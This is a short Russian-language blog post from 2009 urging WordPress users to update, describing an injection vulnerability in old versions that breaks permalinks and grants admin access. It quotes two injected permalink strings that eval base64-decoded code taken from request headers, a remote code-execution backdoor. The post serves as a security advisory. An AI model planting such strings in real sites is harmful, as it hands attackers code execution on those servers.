WordPress. Взлом старых версий
08.09.2009
Очередная маст рид заметка о безопасности WordPress. Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда – обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.
Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.
Атакованные блоги подвергаются хаку, который добавляет к пермалинку:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Комментариев: 6 »
Wordpress
